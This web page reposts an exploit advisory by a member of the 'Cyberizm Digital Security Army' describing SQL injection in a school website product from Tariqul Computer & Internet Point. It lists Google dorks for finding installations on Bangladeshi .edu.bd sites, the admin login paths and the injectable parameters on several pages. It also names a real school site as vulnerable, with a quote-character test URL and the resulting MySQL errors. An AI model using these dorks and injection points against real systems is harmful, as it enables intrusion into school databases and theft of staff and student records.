facebook facebook twitter rss

Tariqul Computer & Internet Point TcipBD SQL Injection Vulnerability

Author: KingSkrupellos , Published: 11-01-2019
###################################################################

# Exploit Title : Tariqul Computer & Internet Point TcipBD SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : tcipbd.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Developed By: Tariqul Computer & Internet Point'' site:edu.bd
intext:''TARIQUL COMPUTER & INTERNET POINT'' site:edu.bd
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# Cyberizm Exploit Reference Link :
cyberizm.org/cyberizm-tariqul-computer-internet-point-tcipbd-sql-injection.html

###################################################################

# Admin Panel Login Path :
************************

/admin/login.php
/teacher/login.php

# SQL Injection Exploit :
**********************

/teacher_details.php?link=[SQL Injection]

/employee_details.php?link=[SQL Injection]

/teacher_information.php?id=[SQL Injection]

/teacher_information.php?id=[ID-NUMBER-HERE]&cat=[SQL Injection]

/commute_details.php?link=[SQL Injection]

/commute.php?id=[SQL Injection]

/info_details.php?link=[YEAR]&id=[SQL Injection]

/t_per_details.php?date=[YEAR-MONTH-DAY][SQL Injection]

/s_details_details.php?link=[ID-NUMBER-HERE]
&date=[YEAR-MONTH-DAY]&class=[SQL Injection]

/s_per_details.php?class=[ID-NUMBER-HERE]
&sec=[ID-NUMBER-HERE]&date=[YEAR-MONTH-DAY][SQL Injection]

###################################################################

# Example Vulnerable Site =>
*****************************

[+] akkelpurghs.edu.bd/teacher_details.php?link=19%27

=> [ Proof of Concept for SQL Inj ] => archive.vn/1PDNL

###################################################################

# SQL Database Error :
*********************

Warning: mysql_num_rows() expects parameter 1 to be resource,

boolean given in /home/tcaip/akkelpurghs.edu.bd/teacher_details.php on line 11

Warning: mysql_fetch_assoc() expects parameter 1 to be resource,

boolean given in /home/tcaip/akkelpurghs.edu.bd/s_details_details.php on line 17

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###################################################################

Like us on Facebook :